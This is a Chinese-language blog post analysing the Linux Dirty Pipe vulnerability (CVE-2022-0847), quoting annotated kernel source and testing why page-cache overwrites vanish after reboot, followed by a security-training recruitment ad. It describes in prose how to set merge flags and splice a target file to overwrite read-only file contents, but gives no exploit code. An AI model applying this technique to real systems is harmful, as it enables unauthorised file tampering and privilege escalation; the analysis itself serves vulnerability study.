漏洞成因
-
pipe维护了一个
structpipe_buffer
的数组,每个pipe_buffer指向一个page,page里存的就是pipe的数据 -
正常情况下,往pipe里写数据时会申请一个page,把数据拷贝到page里后再让pipe_buffer指向这个page。splice系统调用实现了一种零拷贝的技术,直接让pipe_buffer指向这个原始的数据page,这样就省去了内存拷贝的过程,提升效率
-
往pipe里写数据时不可能每次都正好是page_size的整数倍,如果每次写数据都要重新分配一个新的page来存,必然会造成空间的浪费。但是如果pipe_buffer的
PIPE_BUF_FLAG_CAN_MERGE
flag被置位,数据就会接着上一次的数据在同一个page中写入,而不是申请新的page,减少了空间的浪费 -
但是splice在给pipe_buffer赋值时没有初始化flag,这就造成之前被置位的
PIPE_BUF_FLAG_CAN_MERGE
flag不会被清除,所以只要先让所有的pipe_buffer的PIPE_BUF_FLAG_CAN_MERGE
flag被置位,然后调用splice让pipe_buffer指向目标文件page cache,这时再向pipe里写数据就会直接修改page cache里的内容,造成任意文件覆盖漏洞
源码分析
以下源码来自Linux5.8.1
pipe
关键数据结构
pipe_inode_info
/**
* struct pipe_inode_info - a linux kernel pipe
* @mutex: mutex protecting the whole thing
* @rd_wait: reader wait point in case of empty pipe
* @wr_wait: writer wait point in case of full pipe
* @head: The point of buffer production
* @tail: The point of buffer consumption
* @note_loss: The next read() should insert a data-lost message
* @max_usage: The maximum number of slots that may be used in the ring
* @ring_size: total number of buffers (should be a power of 2)
* @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
* @tmp_page: cached released page
* @readers: number of current readers of this pipe
* @writers: number of current writers of this pipe
* @files: number of struct file referring this pipe (protected by ->i_lock)
* @r_counter: reader counter
* @w_counter: writer counter
* @fasync_readers: reader side fasync
* @fasync_writers: writer side fasync
* @bufs: the circular array of pipe buffers
* @user: the user who created this pipe
* @watch_queue: If this pipe is a watch_queue, this is the stuff for that
**/
struct pipe_inode_info {
struct mutex mutex;
wait_queue_head_t rd_wait, wr_wait;
unsigned int head;
unsigned int tail;
unsigned int max_usage;
unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
bool note_loss;
#endif
unsigned int nr_accounted;
unsigned int readers;
unsigned int writers;
unsigned int files;
unsigned int r_counter;
unsigned int w_counter;
struct page *tmp_page;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
struct pipe_buffer *bufs;
struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue;
#endif
};
其中bufs是一个structpipe_buffer
的数组,默认数量为16,每个pipe_buffer能存储一个page的数据。这16个page组成一个环形缓冲区,用来存储管道里的数据。
pipe_buffer
/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
PIPE_BUF_FLAG_CAN_MERGE
就包含在flags字段中,它将影响page指向的内存页
写pipe
调用write向pipe里写数据时会经过层层调用,最终实际调用pipe_write
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);
ssize_t chars;
bool was_empty = false;
bool wake_next_writer = false;
/* Null write succeeds. */
if (unlikely(total_len == 0))
return 0;
__pipe_lock(pipe);
// 确保读者数量不为0
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
ret = -EPIPE;
goto out;
}
#ifdef CONFIG_WATCH_QUEUE
if (pipe->watch_queue) {
ret = -EXDEV;
goto out;
}
#endif
/*
* Only wake up if the pipe started out empty, since
* otherwise there should be no readers waiting.
*
* If it wasn't empty we try to merge new data into
* the last buffer.
*
* That naturally merges small writes, but it also
* page-aligs the rest of the writes for large writes
* spanning multiple pages.
*/
head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1); // 要写入的数据的大小相对页帧大小的余数
// 如果余数不为0,且pipe不为空
if (chars && !was_empty) {
unsigned int mask = pipe->ring_size - 1;
// 当前头部的上一个缓冲区,因为要尝试将多余的数据与之前的数据合并
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
int offset = buf->offset + buf->len;
// 如果PIPE_BUF_FLAG_CAN_MERGE被置位,且buf能容下chars大小的数据
if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;
// 将chars大小的数据写入缓冲区
ret = copy_page_from_iter(buf->page, offset, chars, from);
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}
buf->len += ret;
// 如果没有其余数据需要写入,则退出
if (!iov_iter_count(from))
goto out;
}
}
for (;;) {
// 确保对着数量不为0
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}
head = pipe->head;
// 如果pipe没被填满
if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[head & mask];
struct page *page = pipe->tmp_page; // tmp_page用来临时存数据
int copied;
// 如果tmp_page还未分配,则用alloc_page分配一个page并赋值
if (!page) {
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}
/* Allocate a slot in the ring in advance and attach an
* empty buffer. If we fault or otherwise fail to use
* it, either the reader will consume it or it'll still
* be there for the next write.
*/
// 自旋锁锁住读者等待队列
spin_lock_irq(&pipe->rd_wait.lock);
head = pipe->head;
// 如果pipe已经被填满则进入下一次循环
if (pipe_full(head, pipe->tail, pipe->max_usage)) {
spin_unlock_irq(&pipe->rd_wait.lock);
continue;
}
// 先让头部指针指向下一个缓冲区
pipe->head = head + 1;
spin_unlock_irq(&pipe->rd_wait.lock);// 释放自旋锁
/* Insert it into the buffer array */
buf = &pipe->bufs[head & mask];
buf->page = page; //将之前分配的tmp_page赋值给buf->page
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = 0;
// 如果创建pipe时没有指定O_DIRECT选项,则将flags设置为PIPE_BUF_FLAG_CAN_MERGE
// 所以只要创建pipe时不指定flags,就能将buffer的PIPE_BUF_FLAG_CAN_MERGE置位
if (is_packetized(filp))
buf->flags = PIPE_BUF_FLAG_PACKET;
else
buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
pipe->tmp_page = NULL; // tmp_page置空
// 拷贝一页大小的数据到page里
copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
if (!ret)
ret = -EFAULT;
break;
}
ret += copied;
buf->offset = 0;
buf->len = copied;
if (!iov_iter_count(from))
break;
}
......
}
splice
splice系统调用主要由do_splice函数完成,do_splice根据输入的文件描述符进入不同的分支,在本次漏洞利用中因为in是普通文件,out是pipe,所以会进入if (opipe)
这个分支
/*
* Determine where to splice to/from.
*/
long do_splice(struct file *in, loff_t __user *off_in,
struct file *out, loff_t __user *off_out,
size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset;
long ret;
if (unlikely(!(in->f_mode & FMODE_READ) ||
!(out->f_mode & FMODE_WRITE)))
return -EBADF;
ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
// in和out都是pipe
if (ipipe && opipe) {
......
}
// 只有in是pipe
if (ipipe) {
......
}
// 只有out是pipe
if (opipe) {
// 处理in和out的偏移
if (off_out)
return -ESPIPE;
if (off_in) {
if (!(in->f_mode & FMODE_PREAD))
return -EINVAL;
if (copy_from_user(&offset, off_in, sizeof(loff_t)))
return -EFAULT;
} else {
offset = in->f_pos;
}
if (out->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;
pipe_lock(opipe);
// 等待pipe有可用的缓冲区
ret = wait_for_space(opipe, flags);
if (!ret) {
unsigned int p_space;
/* Don't try to read more the pipe has space for. */
p_space = opipe->max_usage - pipe_occupancy(opipe->head, opipe->tail);// pipe可用空间
len = min_t(size_t, len, p_space << PAGE_SHIFT);// 实际读取长度不能超过pipe可用空间
ret = do_splice_to(in, &offset, opipe, len, flags); // 调用do_splice_to完成主要工作
}
pipe_unlock(opipe);
if (ret > 0)
wakeup_pipe_readers(opipe);
if (!off_in)
in->f_pos = offset;
else if (copy_to_user(off_in, &offset, sizeof(loff_t)))
ret = -EFAULT;
return ret;
}
return -EINVAL;
}
在do_splice_to中又调用了输入文件的splice_read函数,之后又经过一系列的调用,最终由copy_page_to_iter_pipe完成关联page_cage和pipe缓冲区的工作
tatic size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
struct pipe_inode_info *pipe = i->pipe;
struct pipe_buffer *buf;
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head = i->head;
size_t off;
if (unlikely(bytes > i->count))
bytes = i->count;
if (unlikely(!bytes))
return 0;
if (!sanity(i))
return 0;
off = i->iov_offset;
buf = &pipe->bufs[i_head & p_mask];
if (off) {
// 如果要求的offset和实际的offset相同,且头部的buffer指向的就是当前的page cache
// 则直接移动offset即可
if (offset == off && buf->page == page) {
/* merge with the last one */
buf->len += bytes;
i->iov_offset += bytes;
goto out;
}
i_head++;
buf = &pipe->bufs[i_head & p_mask];
}
if (pipe_full(i_head, p_tail, pipe->max_usage))
return 0;
buf->ops = &page_cache_pipe_buf_ops;
// 增加page的应用计数
get_page(page);
// 将pipe缓冲区的page指针指向文件的page cache
buf->page = page;
buf->offset = offset;
buf->len = bytes;
pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;
out:
i->count -= bytes;
return bytes;
}
可以看到copy_page_to_iter_pipe函数直接将page cache赋值给对应buffer的page指针,而没有对buffer的flags做初始化存在,使得之前被设置
的PIPE_BUF_FLAG_CAN_MERGE
仍然有效
能真正地覆盖文件内容吗
由上面的漏洞分析可知,最终完成的对page cache的覆写,而不是覆盖磁盘上的文件内容。当文件的page cache存在时,之后读取该文件都将直接从page cache中获取,所以只要该page cache存在,就相当于覆盖了文件内容。经测试,只要重启系统后page cache就会消失,此时再读取文件将会得到原文件内容。
但是page cache不是有writeback机制吗,只要触发该机制是不是就能将覆写后的page cache写回磁盘呢?
为了验证这个问题,我调用sync来手动触发writeback
观察程序输出结果发现,调用sync之后读取文件内容仍然是篡改过后的内容,看起来sync似乎真的把page cache里写回到了磁盘里
但当我重启系统之后发现文件内容又复原了,说明sync即没有把page cache写回到磁盘,也没有清除缓存中的内容,相当于直接忽略了这个被篡改过的page,这是为什么呢?
经过调试发现,在向普通文件写入数据时,调用的是generic_file_write_iter函数
经过如下图所示的调用,最终会调用set_page_dirty函数将该page置为dirty状态,所以最终会被writeback机制写回到磁盘中
正如源码分析中所说的,向pipe中写入数据时调用的是pipe_write,这时我给set_page_dirty函数设置断点发现,程序之后都没有调用这个函数,这点从源码中也可以证明。
这说明当我们利用漏洞修改page cache中的内容时,系统并没有将对应的page设置为dirty,所以这个修改对writeback机制来说是不可见的,自然会被忽略掉。
那为什么重启系统文件内容又会恢复呢?那是因为重启系统将所有的缓存都回收了,执
行echo 1 > /proc/sys/vm/drop_caches
命令能手动回收缓存,也能将文件内容恢复
参考资料
The Dirty Pipe Vulnerability
CVE-2022-0847-DirtyPipe-Exploit
Linux5.8.1源码
CVE-2022-0847 漏洞分析
VFS源码分析-Page Cache Writeback机制
来源:先知(https://xz.aliyun.com/t/6754)
注:如有侵权请联系删除
船山院士网络安全团队长期招募学员,零基础上课,终生学习,知识更新,学习不停!包就业,护网,实习,加入团队,外包项目等机会,月薪10K起步,互相信任是前提,一起努力是必须,成就高薪是目标!相信我们的努力你可以看到!想学习的学员,加下面小浪队长的微信咨询!
欢迎大家加群一起讨论学习和交流
(此群已满200人,需要添加群主邀请)
阳光正好,奋力奔跑;
拼搏当下,未来可期!
原文始发于微信公众号(衡阳信安):CVE-2022-0847-DirtyPipe分析
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论